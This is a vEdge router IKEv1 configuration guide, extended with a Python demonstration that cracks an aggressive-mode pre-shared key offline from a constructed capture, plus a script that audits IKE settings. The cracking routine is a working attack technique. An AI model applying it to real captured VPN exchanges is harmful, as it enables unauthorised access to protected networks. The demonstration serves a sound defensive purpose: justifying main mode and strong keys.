Security Configuration Guide for vEdge Routers, Cisco SD-WAN Release 20

When you create an IPsec tunnel on a vEdge router, IKE Version 1 is enabled by default on the tunnel interface. The following
properties are also enabled by default for IKEv1:

  • authentication and encryption—AES-256 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message authentication
    code algorithm for integrity

  • Diffie-Hellman group number—16

  • Rekeying time interval—4 hours

  • SA establishment mode—Main

By default, IKEv1 uses IKE main mode to establish IKE SAs. In this mode, six negotiation packets are exchanged to establish
the SA. To exchange only three negotiation packets, enable aggressive mode:

Note: IKE aggressive mode with pre-shared keys should be avoided wherever possible. In aggressive mode the responder's
authentication hash (HASH_R) is sent unencrypted in the second message, and every other input to that hash is also visible
on the wire, so anyone who captures the exchange can test pre-shared-key guesses offline. If aggressive mode cannot be
avoided, choose a long, random pre-shared key.


vEdge(config)# vpn vpn-id interface ipsecnumber ike
vEdge(config-ike)# mode aggressive
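The reason behind the note above, as an added example that is not part of the original guide or of any vEdge code: with pre-shared-key authentication, RFC 2409 defines SKEYID = prf(PSK, Ni | Nr) and HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b). In aggressive mode HASH_R travels in cleartext in message 2 and all of its other inputs are in messages 1 and 2, so a passive observer can verify PSK guesses offline without sending another packet; in main mode HASH_R is only sent encrypted in messages 5 and 6. The captured values below are constructed (random stand-ins for cookies, nonces and DH public values; the peer identity, SA payload and word list are invented).

```python
import hashlib
import hmac
import secrets
from typing import Dict, List, Optional


def prf(key: bytes, data: bytes) -> bytes:
    """IKEv1 pseudo-random function for the *-sha1 cipher suites: HMAC-SHA1 (RFC 2409)."""
    return hmac.new(key, data, hashlib.sha1).digest()


def hash_r(psk: bytes, m: Dict[str, bytes]) -> bytes:
    """Responder authentication hash for pre-shared-key authentication (RFC 2409, section 5).

    SKEYID = prf(PSK, Ni_b | Nr_b)
    HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    Every input except the PSK is visible in aggressive-mode messages 1 and 2.
    """
    skeyid = prf(psk, m["ni"] + m["nr"])
    return prf(skeyid, m["g_xr"] + m["g_xi"] + m["cky_r"] + m["cky_i"] + m["sai_b"] + m["idir_b"])


def capture_aggressive_exchange(psk: bytes) -> Dict[str, bytes]:
    """Constructed stand-in for what a passive observer sees in aggressive-mode messages 1 and 2.

    The DH public values are random bytes rather than real group-16 (4096-bit MODP) elements;
    the attack needs only their on-the-wire bytes, never the private exponents.
    """
    m = {
        "cky_i": secrets.token_bytes(8),      # initiator cookie
        "cky_r": secrets.token_bytes(8),      # responder cookie
        "sai_b": bytes.fromhex("00000001000000010000002801010001"),  # constructed SA payload body
        "g_xi": secrets.token_bytes(512),     # initiator KE payload (g^xi)
        "g_xr": secrets.token_bytes(512),     # responder KE payload (g^xr)
        "ni": secrets.token_bytes(20),        # initiator nonce
        "nr": secrets.token_bytes(20),        # responder nonce
        "idir_b": b"\x02\x00\x00\x00vedge-hub",  # ID payload body: ID_FQDN "vedge-hub" (constructed)
    }
    m["hash_r"] = hash_r(psk, m)              # sent in cleartext in message 2
    return m


def crack_psk(m: Dict[str, bytes], wordlist: List[bytes]) -> Optional[bytes]:
    """Offline dictionary attack: recompute HASH_R per guess; no traffic to the router is needed."""
    for guess in wordlist:
        if hmac.compare_digest(hash_r(guess, m), m["hash_r"]):
            return guess
    return None


if __name__ == "__main__":
    words = [b"password", b"Cisco123", b"sdwan2020", b"vedge!"]   # constructed word list
    weak = capture_aggressive_exchange(b"Cisco123")
    print("weak PSK recovered:", crack_psk(weak, words))
    strong = capture_aggressive_exchange(secrets.token_bytes(32))
    print("random 32-byte PSK recovered:", crack_psk(strong, words))
```

The only defence a PSK has here is its entropy: a word from a list falls immediately, while a 32-byte random secret is out of reach of any dictionary, which is exactly why the guide tells you to prefer main mode and, failing that, a strong key.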

By default, IKEv1 uses Diffie-Hellman group 16 in the IKE key exchange. This group uses the 4096-bit modular exponential
(MODP) group during IKE key exchange. You can change the group number to 2 (for 1024-bit MODP), 14 (2048-bit MODP), or 15
(3072-bit MODP). Group 2 is well below the strength of the other groups and should be used only when a peer cannot
negotiate group 14 or higher:

vEdge(config)# vpn vpn-id interface ipsecnumber ike
vEdge(config-ike)# group number

By default, IKE key exchange uses AES-256 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message
authentication code algorithm for integrity. You can change the cipher suite:

vEdge(config)# vpn vpn-id interface ipsecnumber ike
vEdge(config-ike)# cipher-suite suite

The cipher suite can be one of the following:

  • aes128-cbc-sha1—AES-128 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message authentication code algorithm for
    integrity

  • aes128-cbc-sha2—AES-128 advanced encryption standard CBC encryption with the HMAC-SHA256 keyed-hash message authentication code algorithm
    for integrity

  • aes256-cbc-sha1—AES-256 advanced encryption standard CBC encryption with the HMAC-SHA1 keyed-hash message authentication code algorithm for
    integrity; this is the default.

  • aes256-cbc-sha2—AES-256 advanced encryption standard CBC encryption with the HMAC-SHA256 keyed-hash message authentication code algorithm
    for integrity

By default, IKE keys are refreshed every 4 hours (14,400 seconds), matching the default listed above. You can change the
rekeying interval to a value from 30 seconds through 14 days (1,209,600 seconds). It is recommended that the rekeying
interval be at least 1 hour.

vEdge(config)# vpn vpn-id interface ipsecnumber ike
vEdge(config-ike)# rekey seconds

To force the generation of new keys for an IKE session, issue the request ipsec ike-rekey command:

vEdge# request ipsec ike-rekey vpn vpn-id interface ipsecnumber

For IKE, you can also configure preshared key (PSK) authentication:

vEdge(config)# vpn vpn-id interface ipsecnumber ike
vEdge(config-ike)# authentication-type pre-shared-key pre-shared-secret password

password is the password to use with the preshared key. It can be an ASCII or a hexadecimal string from 1 through 127
characters long. Because this secret is all that authenticates the peer, use a long random value rather than a word or
phrase.

If the remote IKE peer requires a local or remote ID, you can configure this identifier:

vEdge(config)# vpn vpn-id interface ipsecnumber ike authentication-type
vEdge(config-authentication-type)# local-id id
vEdge(config-authentication-type)# remote-id id

The identifier can be an IP address or any text string from 1 through 63 characters long. By default, the local ID is the
tunnel's source IP address and the remote ID is the tunnel's destination IP address.
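The IKE settings above (mode, group, cipher suite, rekey interval, pre-shared key and IDs) are steps of one tunnel configuration, so here is a single added example that checks a whole ike block against the guidance on this page. It is not Cisco code: the two configurations are constructed samples written in the running-config layout of a vEdge router (the exact nesting of the authentication-type block may differ on a real device), the hostnames, addresses and secret are invented, and the thresholds (group 14 or higher, rekey of at least 1 hour, a PSK of at least 20 characters) are this editor's choices. The first sample combines the weak choices the page warns against; the second is the corrected form.

```python
from typing import Dict, List, Tuple

# Constructed samples in vEdge running-config layout (illustrative nesting, not captured from a device).
WEAK_CONFIG = """\
vpn 1
 interface ipsec1
  tunnel-source 192.0.2.10
  tunnel-destination 198.51.100.20
  ike
   version 1
   mode aggressive
   rekey 600
   cipher-suite aes128-cbc-sha1
   group 2
   authentication-type
    pre-shared-key
     pre-shared-secret cisco
    !
   !
  !
 !
!
"""

HARDENED_CONFIG = """\
vpn 1
 interface ipsec1
  tunnel-source 192.0.2.10
  tunnel-destination 198.51.100.20
  ike
   version 1
   mode main
   rekey 14400
   cipher-suite aes256-cbc-sha2
   group 16
   authentication-type
    pre-shared-key
     pre-shared-secret "9f2c7b1e4d8a6c3f0b5e7a9d1c4f6b8e2a7d3c5f"
     local-id branch-42.example.net
     remote-id hub.example.net
    !
   !
  !
 !
!
"""

MODP_BITS = {2: 1024, 14: 2048, 15: 3072, 16: 4096}
# Defaults from the page, used when a keyword is absent from the ike block.
DEFAULTS = {"mode": "main", "group": "16", "rekey": "14400", "cipher-suite": "aes256-cbc-sha1"}


def parse_ike(config: str) -> Dict[str, str]:
    """Flatten the 'ike' block of a running-config into {keyword: value}.

    Relies on the indentation/'!' layout above; nested keywords (pre-shared-secret,
    local-id, remote-id) are flattened because their names are unique within the block.
    """
    settings: Dict[str, str] = {}
    ike_indent = None
    for line in config.splitlines():
        stripped = line.strip()
        indent = len(line) - len(line.lstrip())
        if ike_indent is None:
            if stripped == "ike":
                ike_indent = indent
            continue
        if indent <= ike_indent:          # back at interface level: the ike block is finished
            break
        if stripped and stripped != "!":
            key, _, value = stripped.partition(" ")
            settings[key] = value.strip().strip('"')
    return settings


def audit_ike(cfg: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (keyword, finding) pairs for settings that contradict the page's guidance."""
    s = {**DEFAULTS, **cfg}
    findings: List[Tuple[str, str]] = []
    psk = s.get("pre-shared-secret")
    if s["mode"] == "aggressive" and psk is not None:
        findings.append(("mode", "aggressive mode with a PSK exposes HASH_R to offline guessing; use main mode"))
    group = int(s["group"])
    if group < 14:
        findings.append(("group", f"DH group {group} is {MODP_BITS.get(group, '?')}-bit MODP; use 14 or higher"))
    rekey = int(s["rekey"])
    if not 30 <= rekey <= 1209600:
        findings.append(("rekey", f"{rekey} s is outside the valid range 30-1209600"))
    elif rekey < 3600:
        findings.append(("rekey", f"{rekey} s is below the recommended minimum of 1 hour"))
    if s["cipher-suite"].endswith("sha1"):
        findings.append(("cipher-suite", "HMAC-SHA1 integrity; prefer aes256-cbc-sha2"))
    if psk is not None and len(psk) < 20:
        findings.append(("pre-shared-secret", f"{len(psk)}-character PSK is short; use a long random value"))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_ike(parse_ike(text)) or "no findings")
```

Running it against an empty ike block (all page defaults) reports only the SHA-1 cipher suite, which is the one default a practitioner would usually change; the weak sample trips every check, the hardened one none.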